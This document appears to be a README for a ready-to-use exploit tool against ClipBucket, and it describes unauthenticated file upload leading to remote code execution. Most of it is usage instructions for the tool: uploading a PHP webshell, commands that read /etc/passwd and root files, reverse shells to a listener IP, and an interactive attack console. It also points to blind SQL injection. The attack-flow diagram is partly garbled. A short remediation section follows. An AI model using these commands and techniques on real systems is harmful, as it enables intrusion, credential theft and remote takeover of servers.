## https://sploitus.com/exploit?id=81738E6F-592A-558F-886D-1F2C08F70045
# ClipBucket-EDB-44250
Unauthenticated Remote Code Execution in ClipBucket -u [options]
```
```
Options:
-t Target URL
-u HTTP Basic Auth user:password (if required)
--cmd Single OS command print output and exit
--revshell Trigger reverse shell to your listener
--lhost Listener IP auto-detected from tun0
--lport Listener port default: 4444
--type Shell type bash ยท python3 ยท nc ยท mkfifo
--fresh Force new upload ignore cached webshell
--proxy Route through proxy http://127.0.0.1:8080
--timeout Request timeout default: 15
Modes:
No flag โ Interactive console (command loop via webshell)
--cmd "whoami" โ Single command, print output and exit
--revshell โ OSCP-style reverse shell, start nc first
```
**Recommended workflow:**
```bash
# 1. Drop into interactive console (uploads webshell automatically)
python exploit.py -t http://10.10.11.50 -u admin:pass
# 2. Or run a single command directly
python exploit.py -t http://10.10.11.50 -u admin:pass --cmd "cat /etc/passwd"
python exploit.py -t http://10.10.11.50 -u admin:pass --cmd "cat /root/root.txt"
# 3. Get a proper shell when you need interactivity
# Start your listener first: nc -lvnp 4444
python exploit.py -t http://10.10.11.50 -u admin:pass --revshell --lhost 10.10.14.5
python exploit.py -t http://10.10.11.50 -u admin:pass --revshell --lhost 10.10.14.5 --lport 9001 --type python3
```
The webshell path is cached after the first run. Subsequent executions reuse it without re-uploading (verified with a live probe first). Use `--fresh` to force a new upload.
**Interactive console commands:**
```
exploit> info Show id, hostname, cwd, uname
exploit> run Execute an OS command
exploit> revshell Trigger reverse shell (prompts for lhost/lport)
exploit> webshell Print the active webshell URL
exploit> help Show command reference
exploit> exit Close the console
```
Per-option help: `python exploit.py -h`
---
## How it works
### The vulnerability
ClipBucket's upload handlers โ `/actions/beats_uploader.php` and `/actions/photo_uploader.php` โ accept file uploads with no authentication, no extension filtering, and no content-type validation. Uploading a `.php` file works exactly like uploading an image. The file lands in a web-accessible directory and Apache serves it directly, including executing PHP.
The upload endpoint responds with a JSON object containing the real filename assigned by the server and the directory where it was stored:
```json
{"success":"yes","file_name":"1779640458a5d67e","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
```
The exploit reads `file_name` + `extension` from that response to know exactly what to look for, then scans for directory listings to locate the real URL of the uploaded file. Once found, it verifies execution with a live probe before using the path.
### Attack flow
```
Attacker ClipBucket (PHP/Apache)
โ โ
โโโ POST /actions/beats_uploader.php โโโ>โ
โ file=shell.php (PHP code) โ No auth check
โ plupload=1 โ No extension filter
โ name=file.php โ File saved to disk
โ โ
โโ
โ โ Apache directory listing
โ.php?cmd=id โโโโโโโโโ>โ
โ โ PHP executes the command
โ" http://TARGET/api/file_uploader.php
```
**Blind SQL Injection** โ `channelId` in `/actions/vote_channel.php` and `email`/`username` in `/ajax/commonAjax.php` are injectable. Time-based blind via `BENCHMARK()`.
---
## Remediation
```bash
# Update ClipBucket to Release 4902 or later
# https://github.com/arslancb/clipbucket/releases
```
If patching immediately is not possible:
- Block unauthenticated access to `/actions/beats_uploader.php` and `/actions/photo_uploader.php`
- Disable PHP execution in upload directories via `.htaccess` (`php_flag engine off`)
- Restrict directory listing for upload paths in Apache/Nginx config
---
## References
- [Exploit-DB EDB-44250](https://www.exploit-db.com/exploits/44250)
- [SEC Consult Advisory](https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html)
- [ClipBucket Releases](https://github.com/arslancb/clipbucket/releases)
---
> For authorized penetration testing and educational purposes only.